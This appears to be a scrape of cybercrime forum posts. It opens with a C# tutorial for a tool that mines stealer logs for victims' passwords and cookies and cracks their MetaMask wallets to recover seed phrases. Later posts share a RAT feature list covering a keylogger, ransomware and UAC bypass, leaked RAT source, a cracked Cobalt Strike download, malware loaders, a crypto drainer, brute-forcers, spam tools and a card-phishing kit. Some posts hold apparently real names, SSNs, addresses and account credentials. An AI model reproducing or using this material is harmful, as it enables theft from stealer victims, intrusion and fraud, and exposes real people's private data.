Convert.FromBase64String(IV ?? ""),
Convert.FromBase64String(Data ?? ""));
}
}
public class KeyMetaData
{
[JsonPropertyName("algorithm")]
public string Algoritm { get; set; } = "PBKDF2";
[JsonPropertyName("params")]
public Params Params { get; set; } = new();
}
public class Params
{
[JsonPropertyName("iterations")]
public int Itterrations { get; set; } = 10000;
}
Spoiler: DecryptMode.cs
C#:Copy to clipboard
public enum DecryptMode
{
CPU,
GPU
}
Spoiler: MetamaskOptions.cs
C#:Copy to clipboard
/// <summary>Настройки работы Metamask</summary>
public class MetamaskOptions
{
/// <summary>
/// Тип получения зашифрованной строки метамаск
/// REGEX - парсинг с помощью регулярного выражения
/// PARSE - парсинг с помощью последовательного поиска JSON
/// COMBO - первое, в случае ненахода второе
/// </summary>
public ParseMode ParseMode { get; set; } = ParseMode.COMBO;
/// <summary>
/// Тип расшифровки
/// CPU - на процессоре
/// GPU - на видеокарте (необходим HashCat)
/// </summary>
public DecryptMode DecryptMode { get; set; } = DecryptMode.CPU;
/// <summary>Глубина генерации адресов</summary>
public int DepthAddress { get; set; } = 10;
}
Spoiler: ParseMode.cs
C#:Copy to clipboard
public enum ParseMode
{
REGEX,
PARSE,
COMBO
}
Spoiler: Metamask.cs
C#:Copy to clipboard
/// <summary>
/// Расшифровка Метамаск
/// </summary>
public class Metamask : BaseDecryptor.BaseDecryptor
{
private readonly MetamaskOptions _options;
public Metamask(MetamaskOptions options)
{
_options = options;
}
public override async Task<List<Decrypted>> DecryptWallet(string walletDirectory, IEnumerable<string> passwords)
{
var walletFiles = Directory.GetFiles(walletDirectory, "*", SearchOption.AllDirectories)
.Where(x => x.EndsWith(".log"))
.ToArray();
var decryptedWallets = new List<Decrypted>();
foreach (var walletFile in walletFiles)
{
var vault = await ExtractData(walletFile);
var hashCat = vault?.ToHashcat() ?? "";
var decryped = await Decrypt(vault, passwords);
var addresses = AddressGenerator.AddressGenerator.Generate(decryped?.Mnemonic, _options.DepthAddress)
.Select(x => new Address()
{
Hash = x.Hash
}).ToList();
decryptedWallets.Add(new Decrypted()
{
File = walletFile,
Hashcat = hashCat,
Password = decryped?.Password,
Mnemonic = decryped?.Mnemonic,
Addresses = addresses
});
}
return decryptedWallets;
}
/// <summary>
/// Метод расшифроки
/// </summary>
/// <param name="vault">Зашифрованные данны</param>
/// <param name="passwords">Массив паролей</param>
/// <returns></returns>
/// <exception cref="NotImplementedException"></exception>
private async Task<Decode?> Decrypt(Vault? vault, IEnumerable<string> passwords)
{
if (vault == null || vault.IsEmpty())
{
return null;
}
DecryptBase decrypter = _options.DecryptMode switch
{
DecryptMode.CPU => new DecryptCPU(),
DecryptMode.GPU => new DecryptGPU()
};
return await decrypter.Decrypt(vault, passwords);
}
/// <summary>
/// Экстракция vault из файла c кошельком
/// </summary>
/// <param name="walletFile"></param>
/// <returns></returns>
private async Task<Vault?> ExtractData(string walletFile)
{
var textInFile = await File.ReadAllTextAsync(walletFile);
if (!textInFile.Contains("\"vault\""))
{
return null;
}
ExtractorBase extractor = _options.ParseMode switch
{
ParseMode.REGEX => new RegexExtractor(),
ParseMode.PARSE => new ParseExtractor(),
ParseMode.COMBO => new ComboExtractor()
};
return await extractor.ExtractData(textInFile);
}
}
С декриптором закончили. А теперь самое главное. Как получить vault из log
файла быстро, без СМС и регистарции
в ранее созданной папке Utils (CryptoFinder5 -> CryptoFinder5.Extentions ->
Utils) создаем файл JsonUtils
Spoiler: JsonUtils.cs
Как работает этот метод? Он принимает строку, ищет начало json (а json
начинается с { ) и ведет подсчет открытых и закрытых ковычек. Если оно равно,
значит JSON будет 100% валидный
В старой реализации я переводил в строку каждую итерацию, но это крайне
затратно в виду иммутабельности строк в C#
C#:Copy to clipboard
public static class JsonUtils
{
/// <summary>
/// Преобразовывает невалидную JSON строку в валидную путем
/// </summary>
/// <param name="invalidJson">Невалидный JSON</param>
/// <param name="finishLenth">Максимальная длинна</param>
/// <returns></returns>
public static string RepairJson(string invalidJson, uint finishLenth = UInt32.MaxValue)
{
int openedForging = 0;
int closedForging = 0;
// Первое вхождение в json
bool findedStart = false;
var stringBuilder = new StringBuilder();
for (int i = 0; i < finishLenth; i++)
{
// выполняем до первого вхождения
if (!findedStart && invalidJson[i] != '{')
{
continue;
}
switch (invalidJson[i])
{
case '{':
// Первое вхождение получили, выключаем проверку на вхождени
if (!findedStart) findedStart = true;
openedForging++;
stringBuilder.Append(invalidJson[i]);
break;
case '}':
closedForging++;
stringBuilder.Append(invalidJson[i]);
break;
// пропускает символ, он явно не валидный
case '\\':
break;
default:
stringBuilder.Append(invalidJson[i]);
break;
}
// Проходим цикл до тех пор, пока не получим
// одинаковое кол-во открывающих и закрывающих
// одинаковое кол-во гарантирует валидность JSON
if (openedForging == closedForging)
{
break;
}
}
return stringBuilder.ToString();
}
}
-----------------------------------------------------
Генератор адресов
-----------------------------------------------------
Я сделал 2 самых популярных ,которые у меня просили: Ethereum и Solana , для
себя сделаю еще несколько разных, к примеру у меня есть генератор на Doge Coin
В Function создаем CryptoFinder5.AddressGenerator
Папка Models -> AddressModel.cs
Spoiler: AddressModel.cs
Необходим только для того, чтобы разделять адреса. В идеале разделять через Enum, но и так пока что сойдет
C#:Copy to clipboard
public class AddressModel
{
public string Symbol { get; set; }
public string Hash { get; set; }
}
Spoiler: AddressGenerator.cs
Простой статический класс, который будет дальше по цепочке передавать мнемонику и глубину , концентрировать внутри себя адреса и возвращать
C#:Copy to clipboard
public static class AddressGenerator
{
public static List<AddressModel> Generate(string? mnemonic, int depth = 10)
{
if (string.IsNullOrWhiteSpace(mnemonic))
{
return new List<AddressModel>();
}
var ethereum = Ethereum.GetAddresses(mnemonic, depth);
var solana = Solana.GetAddresses(mnemonic, depth);
var unionsAddressModels = ethereum
.Union(solana)
.ToList();
return unionsAddressModels;
}
}
Spoiler: Ethereum.cs
Реализация получения адресов для Ethereum , исползовал библиотеку Nethereum.HdWallet
C#:Copy to clipboard
public static class Ethereum
{
public static List<AddressModel> GetAddresses(string mnemonic, int depth = 10)
=> new Wallet(mnemonic, "").GetAddresses(depth)
.Select(x => new AddressModel()
{
Hash = x,
Symbol = "ETH"
})
.ToList();
}
Spoiler: Solana.cs
C#:Copy to clipboard
public static class Solana
{
public static List<AddressModel> GetAddresses(string mnemonic, int depth = 10)
{
var wallet = new Wallet(mnemonic);
var solanaList = new List<AddressModel>();
for (int i = 1; i < depth + 1; i++)
{
solanaList.Add(new AddressModel()
{
Hash = wallet.GetAccount(i).PublicKey,
Symbol = "SOL"
});
}
return solanaList;
}
}
Вот и все. Выходим на финишную прямую. Как оказалось нет ничего сложного. Просто поэтапно делаем каждый независимый модуль, а завтра объединим их все
Spoiler: День 5. Контроллер запуск
Сейчас у нас есть много независимых библиотек и остается только объединить их
в одну, максимально делегируя логику.
В Function создаем проект LogController это будет концентратор всех наших
методов и реализаций. Все модули подключаем сюда и получаем на выходе вот
такую штуку
Spoiler: LogController.cs
Как видим мы не лазим по созданным библиотекам, а используем только 1 метод, который прописан в абстрактном классе, делегируя логику. А так же мы можем спокойно пользоваться опциями
C#:Copy to clipboard
public class LogController
{
private Parameters _parameters;
public LogController(Parameters parameters)
{
_parameters = parameters;
Prepare();
}
public void RenewParameter(Parameters parameters)
{
_parameters = parameters;
Prepare();
}
/// <summary>
/// Проверка на валидность параметров
/// </summary>
/// <exception cref="DirectoryNotFoundException"></exception>
private void Prepare()
{
if (!Directory.Exists(_parameters.Directory)) throw new DirectoryNotFoundException("Папка с логом не найдена");
}
/// <summary>
/// Получить пароли
/// </summary>
/// <param name="passwordScraperOption">Настройка парсера</param>
/// <returns></returns>
/// <exception cref="Exception"></exception>
public async Task<List<string>> GetPasswordsListFromLog()
{
PasswordScraperBase passwordScraperBase = _parameters.PasswordScraperOption switch
{
PasswordScraperOption.LOW => new PasswordScraperLowPower(),
PasswordScraperOption.MEDIUM => new PasswordScaperMediumPower(),
PasswordScraperOption.HIGH => new PasswordScraperHighPower(),
_ => throw new Exception("Не указан тип парсинга")
};
return await passwordScraperBase.GetPasswordsAsync(_parameters.Directory);
}
/// <summary>
/// Получить куки из лога
/// </summary>
/// <param name="directory">путь до лога</param>
/// <param name="targetBrowser"></param>
/// <returns></returns>
public async Task<List<Cookie>> GetCookiesFromLog(string targetBrowser = null)
{
var cookieScraperBase = new CookieScraperClassicMode();
return await cookieScraperBase.GetCookieList(_parameters.Directory, targetBrowser);
}
/// <summary>
/// Получить кошельки
/// </summary>
/// <returns></returns>
public async Task<List<Wallet>?> GetWalletsFromLog()
{
var walletScraper = new WalletScraperClassic();
var wallets = await walletScraper.GetWalletsList(_parameters.Directory);
return wallets;
}
/// <summary>
/// Попробововать расшифровать кошелек
/// </summary>
/// <param name="wallet"></param>
/// <param name="passwords"></param>
/// <returns></returns>
public async Task<List<Decrypted>> TryDecryptWallet(Wallet wallet, IEnumerable<string> passwords)
{
BaseDecryptor.BaseDecryptor? walletDecrypterBase = wallet.WalletType switch
{
WalletType.Metamask => new Metamask.Metamask(_parameters.MetamaskOptions),
_ => null
};
if (walletDecrypterBase == null)
{
return null;
}
return await walletDecrypterBase.DecryptWallet(wallet.WalletDirectory, passwords);
}
/// <summary>
/// Параметры запуска
/// </summary>
public class Parameters
{
/// <summary>
/// Путь до папки с логом
/// </summary>
public string Directory { get; set; }
/// <summary>
/// Тип получения паролей
/// LOW - только пароли из Password.txt строки Password:
/// MEDIUM - пароли из Password.txt все строки
/// HIGH - пароль из Password и Autofill все строки
/// </summary>
public PasswordScraperOption PasswordScraperOption { get; set; }
/// <summary>
/// Настройки декриптора метамаск
/// </summary>
public MetamaskOptions MetamaskOptions { get; set; } = new();
}
}
Теперь финальный шрих. Создаем в Presetnation консольное(или любое другое приложение) и вместо того, чтобы использовать парсеры и прочее используем только методы 1 единственно класса и немногочисленные настройки
Spoiler: Program.cs
В результате мы не даем что то менять из вне. Логика закреплена и продумана, остается только выбрать настройки и запустить
C#:Copy to clipboard
var mainFolder = @"D:\Logs"; // <- да, это временное решение для теста, это меняется на чтение пути из консоли
var dirs = Directory.GetDirectories(mainFolder);
foreach (var dir in dirs)
{
var logController = new LogController(
new LogController.Parameters()
{
Directory = dir,
PasswordScraperOption = PasswordScraperOption.HIGH,
MetamaskOptions = new MetamaskOptions()
});
var wallets = await logController.GetWalletsFromLog();
if (wallets.IsNotEmpty())
{
foreach (var wallet in wallets)
{
var passwords = await logController.GetPasswordsListFromLog();
var decryptedWallets = await logController.TryDecryptWallet(wallet, passwords);
if (decryptedWallets != null)
{
foreach (var decrypted in decryptedWallets)
{
Console.WriteLine("File: " + decrypted?.File);
Console.WriteLine("Mnemonic: " + decrypted?.Mnemonic);
Console.WriteLine("Hashcat: " + decrypted?.Hashcat);
Console.WriteLine("Password: " + decrypted?.Password);
Console.WriteLine(new string('-', Console.WindowWidth));
Console.WriteLine();
}
}
}
}
}
Надеюсь данная статья будет полезна или поможет натолкнуть на
мысль
Исходники в файле.
Я специально не стал выкладывать чек на баланс. Почему? Потому что много
неопытных маслят захотят навариться на коде и запросто свистнут исходники на
продажу. Я не жадный, но это не приятно.
Так же могу доработать софт под ваши нужны, за этим вопросом в ТГ:
t.me/Skumbriaa
Нужно изменять голос в реальном времени.
конфиг использую зашифрованный. при запуске требуется ввод пароля. задача
запустить цмд от системы и что бы юзеру можно было сделать logoff а утилита
продолжала работу. --no-console скрывает сразу же окно цмд не давая
возможности ввода пароля. через импакет smbexec пробовал, но в шелле не
запрашивается пароль. как передать пароль на ввод и что бы цмд было скрытое и
при этом софт работал после выхода пользователя? батником пробовал но возможно
он был не верно составлен.
кобальтом такое раньше делал без проблем, но в данный момент времен не
пользуюсь этими софтами. Как скрыто запустить и оставить выгрузку с
применением пароля ?
так же пробовал запуск от системы, с флагом --no-console и процесс rclone
запустился, но после логофф юзер отключился и системный процесс этой утилиты
тоже завершился.
вероятно максимально разрешимый рабочий вариант будет без использования
пароля. либо как то сделать скрипт который параметром передаст пароль. а что
бы пароль не засветить, удалить скрипт после выполнения. Может ктото поможет
сваять такой командлет?
I bought this version and i want to share it with you guys, i tested it on RDP, so i don't know if the file is infected or not, just test it on RDP.
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/5m10AY7a#qAOFvFnzLluyXGkAUm_wC5nZvKNkS5NWjvM9bAFUx5c)
mega.nz
RAR PASSWORD: @Attackndroid#
Interface login: wiseemunk
Enjoy!
Брутфорс протоколов SSH, MySQL, HTTP GET auth, FTP
-------------------------------------------------------
Исходник
Скачать
VT
-------------------------------------------------------
Stealer Log Searcher
требуется установка JAVA
Please note that starting from version 23.6.230626159, we have deprecated support for Windows 8, Server 2012 and Server 2012 R2. Please update your Windows Operating System to Windows 10 (or later) or Windows Server 2016 (or later) to use this and upcoming releases.
Только установил cobalt strike, не вижу меню host из которого можно было
запустить ping scan, os detection scan, nmap scan и.т.д.
Куда это всё подевалось? Или я то-то ещё должен дополнительно установить.
Версия 4.1
Покупал год назад майнер на лолзе за 200$ с исходниками и все было вполне норм
кодер куда-то пропал
По итогу особо он мне не нужен
Хотел на лолзе опубликовать как фри софт с исходниками - но отклонили якобы
хеш может идти куда-то
Опубликую здесь
Могли бы вы посмотреть что не так с ним, идет ли хеш в чужие руки?
Внутри архива ты найдешь гайд как поставить панель на дедик и как сделать билд
Майнит:
ETH - 6gb
ETC - 4gb
RVN - 4gb
XMR
( Вроде такие видюхи )
Spoiler: Панель
Настройка пула и кошельков в Program.txt
Там самые популярные защиты и обходы
[Скачать](https://www.dropbox.com/scl/fi/0lmjhuvucxef1m90djjz0/Wasd- Source.rar?dl=0&rlkey=dprsyby4vprk8mpem1hn0r3x1)
Привет всем!
Spoiler: О программе
DMDE - эффективная программа для поиска, редактирования и восстановления данных на дисках. Благодаря использованию специальных алгоритмов, DMDE может восстановить структуру директорий и файлы в некоторых сложных случаях, когда другие программы не дают нужный результат.
DMDE поддерживает файловые системы NTFS/NTFS5, FAT12/16, FAT32, exFAT, Ext2/3/4, HFS+/HFSX, ReFS, APFS (Beta) и работает в Windows, Linux, macOS, DOS.
Восстановление файлов по сигнатурам (Raw-
поиск) для случаев, когда
использование структуры файловой системы невозможно.
Мне нужно было это, и помогло четко. Я очень доволен! нашел 2 кряк, 2й версия
работает как надо, 3й както они умудрились обойти пиратство.
Ссылка постоянная :
Hidden content for authorized users.
](http://www.mediafire.com/file/lbuos16z3e8t72l/DMDE_xss.is.rar/file)
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
www.mediafire.com
пароль как всегда!
Внутр архива:
Hidden content for authorized users.
DMDE Professional Edition v2.4.6.444 Retail Ml_Rus
DMDE v3.6.0.770 Portable Official Ml_Rus
del
Note: I recommend you to use this in a VM or any other Sandbox Environment.
Примечание: Я рекомендую вам использовать это в виртуальной машине или любой
другой среде "песочницы".
Tools:Icon Changer - Multi Binder [Icon - Assembly] | Fud Downloader [HTA-VBS-JS-WSF] - XHVNC - BlockClients
Features:
Information, Monitor [Mouse - Keyboard - AutoSave] , Run File [Disk - Link -
Memory - Script - RunPE] , WebCam [AutoSave] , Microphone , System Sound ,
Open Url [Visible - Invisible] , TCP Connections , ActiveWindows , Process
Manager , Clipboard Manager , Shell , Installed Programs , DDos Attack ,
VB.Net Compiler , Location Manager [GPS - IP] , File Manager , Client [Restart
Options:
Power [Shutdown - Restart - Logoff] , BlankScreen [Enable - Disable] , TaskMgr
[Enable - Disable] , Regedit [Enable - Disable] , UAC [Enable - Disable] ,
Firewall [Enable - Disable] ,.NET 3.5 Install , Disable Update , Run Shell,
Invoke-BSOD
Password Recovery :
Bookmarks - Browsers - All-In-One - DicordTokens , FileZilla - ProduKey -
WifiKeys - Email Clients
Pastime :
CD ROOM [Open - Close] , DesktopIcons [Show - Hide] , SwapMouse [Swap -
Normal] , TaskBar [Show - Hide] , Screen [ON-OFF] , Volume [Up - Down - MUTE]
, Start [Show - Hide] , Clock [Show - Hide] , Text Speak , Explorer [Start -
Kill] , Tray Notify [Show - Hide]
Extra 1 :
KeyLogger , Client Chat ,FileSeacher ,USB Spread , Bot killer , PreventSleep ,
Message Box ,Change Wallpaper , DeleteRestorePoints , UAC Bypass [RunAs -
Cmstp - Computerdefaults - DismCore] , Run Clipper [All Cryptocurrencies]
Extra 2 :
Ransomware [Encrypt - Decrypt] , Ngrok Installer , HVNC , Hidden RDP
,WDDisable , W.D.Exclusion , Install [Startup - Registry - schtasks]
Requirements :
? .Net Framework 4.5 [Controller] ? .NET Framework 4.0 [Client]
_**Поддерживаемые сети
Ethereum, Binance Smart Chain, AVAX, Arbitrum, Optimism, Polygon, Fantom.
Вывод занимает от 0.3 до 3 секунд
Поддержка разных сид-фраз и приватных ключей
Не требуются прокси и что-либо еще.**_
Download - https://dropmefiles.com/BuYrl
Password arhive - https://t.me/llinkcloud
Может у кого завалялась эта софтина крякнутая?
YaGo Parser v4.3 поисковых запросов по ключевым словам в Google and Yandex
Достаточно простой и ефективный софт для сбора линков по ключевым словам
Поддерживает прокси HTTP & Socks 5
Так же есть поддержка сервисов антикапч (AntiGate, RIPcaptcha, Captchabot,
RuCaptcha & 2Captcha)
Можно выбирать парсинг по количевству страниц в поисковике к примеру парсить
только с первой страницы поисковика или с последующих 20-ти
Хорошо подойдет для парсинга Proxy, Open BD, Wordlist и остального, но думаю
кому нужен сам разберется для чего и как уже применять.
Рекомендую использовать на VM или RDP так как софт не мой, но пользуюсь на
постоянной основе.
Spoiler: Скриншот функционала:
Скачать:
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/jEtzFL5C#pNv4TCLTOAPtWSZfFeXAaE-5H3TVz7bjmET558EcL8U)
mega.nz
VT:
](https://www.virustotal.com/gui/file/e34a2522b2d21d6f30ea9a049d606f050f6e23f63d6cd5e380c7ec5c2bc1f687)
VirusTotal
www.virustotal.com
Ищу рабочие стрессеры, желательно бесплатные. Буду благодарен любой информации.
Привет,не много не по теме, но может у кого есть программа для учета авто на автомойке, желательно в дар начинающему комерсу
Zero2Automated Malware Analysis Course
Zero2Automated (The Advanced Malware Analysis Course) is a course developed by Malware Reverse Engineers, for Malware Reverse Engineers, with practicality in mind. The main focus of this course is to teach you the advanced concepts utilized by modern malware, through a practical approach, allowing you to instantly apply the information to your own analyses.
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/QHJHGCbJ#VZuLkpxx4Cvhf1IvtUQNBxwBtThqdwCi6l7huGTPrpQ)
mega.nz
Бот для поиска открытых/незащищенных VNC-серверов. Поиска информации о
кредитных картах на компьютере, на котором работает, а также имеется модуль
для DDoS, сделанный на Python.
Управление осуществляется через IRC.
You must have at least 1 reaction(s) to view the content.
Здравствуйте, мой первый пост на форуме. Надеюсь, это будет полезно.
Примечание: Установите на один сервер вместо двух, внутри находятся установочные файлы.
You must have at least 5 reaction(s) to view the content.
Приветствую
всех читающих данную
тему
В поисках рабочего стиллера , который будет работать на андроид, бюджет 70$,
жду ваши предложения в комментариях к теме
Since I haven't used the loader for a long time and it's old code, I'll give
it here.
cs loader and brc4 staged loader. in the current configuration only on win 10
and 11 not on windows server because an interface of the wlfi driver is used.
Так как я не использую этот лоадер уже достаточно таки давно да и это старенький код я его здесь отдаю. Cs и BRC4 staged loader. В этой конфе только для Винды 10 и 11, для сервера не пойдёт потому что использует драйвер вайфая
PW:xss.is
You must have at least 12 message(s) to view the content.
Spoiler: plugin_feed_info.inc
PLUGIN_SET = "202205230740";
PLUGIN_FEED = "ProfessionalFeed (Direct)";
PLUGIN_FEED_TRANSPORT = "Tenable Network Security Lightning";
CraxsRat Source Code
Leaked
I personally recommend using the source code in your virtual system.It was
not possible to analyze the complete code so I am not responsible if there is
any injection added.Some fraudsters were trying to modify this source code and
sell it by claiming the latest version, so the source code was leaked by
LadyCracKer.If you want more source code or advance tools, please help me by
donating.
WARNING
This source code is shared strictly for educational purposes only!
Unauthorized or malicious use of this material is illegal
and can lead to severe consequences, including legal action.
Use responsibly and ensure your actions comply with ethical and legal
standards.
#CraxsRatSourceCode #CraxsRatSrc #CraxsRatFullSourceCodeLeaked #CraxsRatSln
#AndroidRat #AdnroidRatSourceCode #RatSourceCode #SourceCode #sln
Spoiler
Code:Copy to clipboard
466:
467: Soft: XSS.IS
468: Host: XSS.IS
469: Login: XSS.IS
470: Password: XSS.IS
471:
--------------------------------------------------------------------------------
Ищу тулзу которая нормализует строки 469 и 470 в одну строку и на выходе выдаст "Login:Password". Раньше пользовался "Sorter-X" но до недавнего времени разработчик (Roulen) перестал его обслуживать, либо перенес в приват. Тысяча благодарностей тому кто поможет?
В паблик доступе нашел пак разного рода софта, выложу здесь, может кому будет полезно:
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/rMt0wQ5R#tdu4yJWD_wHoyoCu0PvM6Sz7l7wRxzYr8tmWMg0rVx0)
mega.nz
Соре, если уже было.
Text Xpert - это программа для эффективного рерайтинга статей и размножения текстов. Программа которая поможет получить множество статей из одной, которые обладают предельной уникальностью. Получить из одной статьи другую статью, обладающую высокой уникальностью. Правка научных работ для прохождения контроля уникальности.
Активация программы:
Spoiler: Файлы что в архиве
You must have at least 50 reaction(s) to view the content.
Perform full file system and logical acquisition of iPhone, iPad and iPod Touch devices. Image device file system, extract device secrets (passwords, encryption keys and protected data) and decrypt the file system image.
Full file system acquisition for 64-bit iOS devices with or without a jailbreak
Logical acquisition extracts backups, crash logs, media and shared files
Unlocks iOS devices with pairing records (lockdown files)
Extracts and decrypts protected keychain items
Real-time file system acquisition
Automatically disables screen lock for smooth, uninterrupted acquisition
Supports: all generations of iPhone, iPad, iPad Pro and iPod Touch with and without jailbreak; Apple Watch and Apple TV 4 and 4K; all versions of iOS from iOS 7 to iOS 14.x
More : https://www.elcomsoft.com/eift.html
Download :
https://anonfiles.com/T5H1S240q5/Fornsic-670_rar
VT:
https://www.virustotal.com/gui/file...032288830bb030b4cf2bafdd009bcec15e7/detection
its show IOS Exploit or JailBreak or ... its not VIRUS !
попался дедик с софтом, весит почти гектар, сам мало вообще разбираюсь во многих нынешних, если кто прояснит в полезности дам данные от дедика, ну и скачать можно здесь
You must spend at least 360 day(s) on the forum to view the content.
В общем необходимо поправить билд апк скорее всего что бы он работал на
некоторых версиях телефонов (хуавей,сяоми), на данный момент отстук происходит
но бот сразу засыпает в админке.
Кто готов, пишите в лс.
Спасибо!
Hidden content for authorized users.
](https://anonfiles.com/Vcz4y957o7/Mynulled.me_imacros_zip)
anonfiles.com
Была выложена версия билдера который кто то слил на вт, сми активно форсят эту тему. Держите - говорят работает, сам разобраться не смог, был бы благодарен , если бы помогли.
You must spend at least 365 day(s) on the forum to view the content.
Столкнулся с такой проблемой, не могу отсортировать базу с фуллками, нужно регулярное выражение в notepad++
Фуллки такого формата:
Hidden content for authorized users.
MANNING:KEITH:100 HIGHLAND ST APT
701:HILLSBOROEXAS:76645:467-59-5239:11/12/1971
FREDERICK:ARMSTRONG:17404 NORTH CREEK DRIVE:FARMINGTON:MN:55024:470-48-3162:
Доброго времени суток господа. Нужен хороший стиллер
**Ищу софт для генерации баркодов на Driver License (pdf417). Буду очень благодарен если поделитесь данной софтиной.
Looking for software to generate barcodes for Driver License (pdf417). I will be very grateful if you share this software.**
Фиш под сбор сс. Нужно немного подкорректировать ,но в целом ещё приносит мат. Пароль местный
Презентация: <https://www.blackhat.com/us-20/briefings/schedule/#demystifying- modern-windows-rootkits-20918>
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F247438749%2F155fe280-d737-11ea-9f10-7a8405c5c776&hash=4b4f603be2412c0fcf43e53fe2ee98c5&return_error=1)
legitimate communication channels to control a machine. ](https://github.com/D4stiny/spectre)
A Windows kernel-mode rootkit that abuses legitimate communication channels to control a machine. - D4stiny/spectre
github.com
Подскажите скриптец или код конвертации json to txt/netscape
нужно конвертнуть куки количеством. чет с поиском такого batch scripta пока
как то неудачно
Cobalt Strike 4.9:
https://ponies.cloud/c2/CobaltStrike%204.9%20Cracked%20uCare@Pwn3rzs.7z
Password: 20231004_2218
Original Post: https://x[.]com/akaclandestine/status/1832094676222124222
Приветствую всех!
Господа, кто может посоветовать какие-нибудь протекторы для вредоносного по (кроме Themida). Буду очень благодарен всем за помощь.
Я новичок хочу научитса добивать базы,если что немного шарю в проге первий курс участвовал в олимпиадах,если сможете подкиньте гайдов-софта по иньекциям буду благдарен очень
Здравствуйте, я надеюсь что остались люди у которых ещё открыт оригинальный
AIO.
Что мне нужно.
Снять дамп памяти AIO с вашего сервера.
Зачем мне это нужно ?
Готовится кряк. Уже проделано очень много работы. Восстановили 260/269 функций
который передавал сервер AIO.
Что вам с этого?
- Могу оплатить от 65$( В зависимости сколько копий на сервере у вас открыто
)
- Так же если все получится то получите кряк бесплатно.
Осталось:
for 4.22 10 functions
for 4.23 9 functions
Связь через telegram: http://t.me/oogarisun
Народ подскажите есть ли у кого инструкция по установки на Цербер бота ?
You must have at least 5 reaction(s) to view the content.
link
You must have at least 5 reaction(s) to view the content.
Ищу чекер/парсер фото ibb.co/imgbb.com
существуют ли такие в природе?
Давно заказывал под себя, для спама с корпоративной почты mail.ru по базам.
Лутайте
Hidden content for authorized users.
Не могу найти нигде
Нужна обычная лицензия, не pro
Может кто знает, где скачать можно?
Заранее спасибо
Описание скриптов:
1. 1+1 [Merger] - склейка всех текстовых файлов в папке
2. 1-2 [Unical] - вычитание второй базы из первой
3. AntiDupler - антидубликат
4. Clean_Base - удаление сторок с определенными символами
5. Del_empty_mail - удаление мыл без паролей
6. Delete_From_Base - удаление строк с выбранным символом
7. Delete_Trash - удаление мусорных доменов
8. Domen_Sorter - сортировка доменов
9. Easy_Sorter - простая сортировка доменов
10. Finder_Region - разделение базы на регионы com\ua\fr\de\it и тд (удобно
под Paypal)
11. Low_Reg_Email - перевеод в нижний регистр логинов в почтовых базах
12. Private_Editor - поиск доменных принадлежностей
13. Reverse_Domain - замены выбранных доменов
14. Smena_Razdelitel - замена разделителя
15-20. Сортировки типов баз (login;pass,email;pass,phone;pass,ip;port).
21. Sort_Rus_Zab - Лучший разделитель баз на Русские домены и Забугор!!!
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- folder.png&hash=63d46597e69ae4a51888711a37d2bf45&return_error=1)
](https://mega.nz/folder/DIQigToD#SmjslNWS8ljBd1BYB6WGGg)
51 files and 26 subfolders
mega.nz
Очень жёстко лезет капча , запасайтесь проксями .
Скачать: https://www.sendspace.com/file/j2uioi
ВТ:
https://www.virustotal.com/gui/file...89a6e996d8072a1c4b1d41c3909f6688c44/detection
Зимой как то увлекся спамом, решил написать что то для этого. Ну собственно написал неплохой софт, а потом попал он в чужие руки, а я у шел в другую нишу спама. Как новорег решил внести вклад. Ни где не постил. Написан на POST/GET. За минуту может и 1к отправить, так что работает очень шустро. Список поддерживаемых мыл:
163.com
chello.nl
ziggo.nl
pubfree.com
nimai.it
caiway.nl
yeah.net
km.ru
i.ua
quicknet.nl
home.nl
netvision.net.il
eircom.net
t-online.de
km.ru
tippnet.rs
neobright.net
alliancepharma.co.th
gazeta.pl
jp.bigplanet.com
nitttsu.com.br
talktalk.net
cityweb.de
csc8.com
terra.com.br
indaipur.com
ig.com.br
home.nl
gmx.at
tiscali.cz
srt.com
uc.pt
web.de
hughes.net
rediffmail.com
compralopresto.com
Скрины с партнерок:
Captured with Lightshot
prnt.sc
Captured with Lightshot
prnt.sc
Если такой есть, то скиньте, где можно приобрести данный авторегер который делает моментом бил 350$, в принципе лучше, чтобы не только по usa
CronosPRO is an amazing program.But it has no more other language except
Russian, which is difficult to understand how to use it for non-Russian.
So I made this plugin that can replace the original program's (From this
thread) resource like menu, strings and
dialog.I have extracted the original program's resource and translated them to
English by Google.
I hope you can enjoy it!
BloodHound (https://github.com/BloodHoundAD/BloodHound) is a fantastic tool, useful to collect and analyze data related to an Active Directory server given as input.
- There is an auto-proxy update via the link, the time is indicated in
minutes.
- There is proxy randomization.
- There is a beep when a successful account.
- There is a domain clipping.
- There is a pause.
- There is a proxy download.
- Complete enumeration of accounts.
- Connection / read / write time - I think everything is very clear here, it
is set in milliseconds.
- Also, the program can save the remainder by pressing the (Abort) button.
- Automatic removal of duplicates when loading the database of accounts or
proxies.
- Quick access to results, directly from the program, no need to search for
the folder yourself.
Have reg checker and brute&checker
I recommend that you use a proxy list to avoid being blocked by multiple login
attempts.
Log:
Ddigg@aol.com:Brazen2940 | Coupon: $ 5.00 off your purchase. | YUSREARL3ZGPBTQM | 08\23\19 | Country: US | Card: No | PayPal: Yes | Feedback: 2 | UserID: dcdiggs1 | Address: 3803 Saxon Hollow Ct Friendswood, TX 77546-3258 United States +1 3109885329 | Seller: No
Download
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/RSQhQI7K#wc3PRCjEgatALdQju4nJxtIel0sp0XEvU9Df87pMMbY)
mega.nz
](https://www.sendspace.com/file/djeyfs)
Send, Receive, Track & Share Your Big Files with SendSpace file sharing!
www.sendspace.com
VT
](https://www.virustotal.com/gui/file/0b6b053da2bb6b2a9eebebca3804788ed801c4a70f76dbddf8889d6ecdeb4a38/detection)
VirusTotal
www.virustotal.com
enjoy!
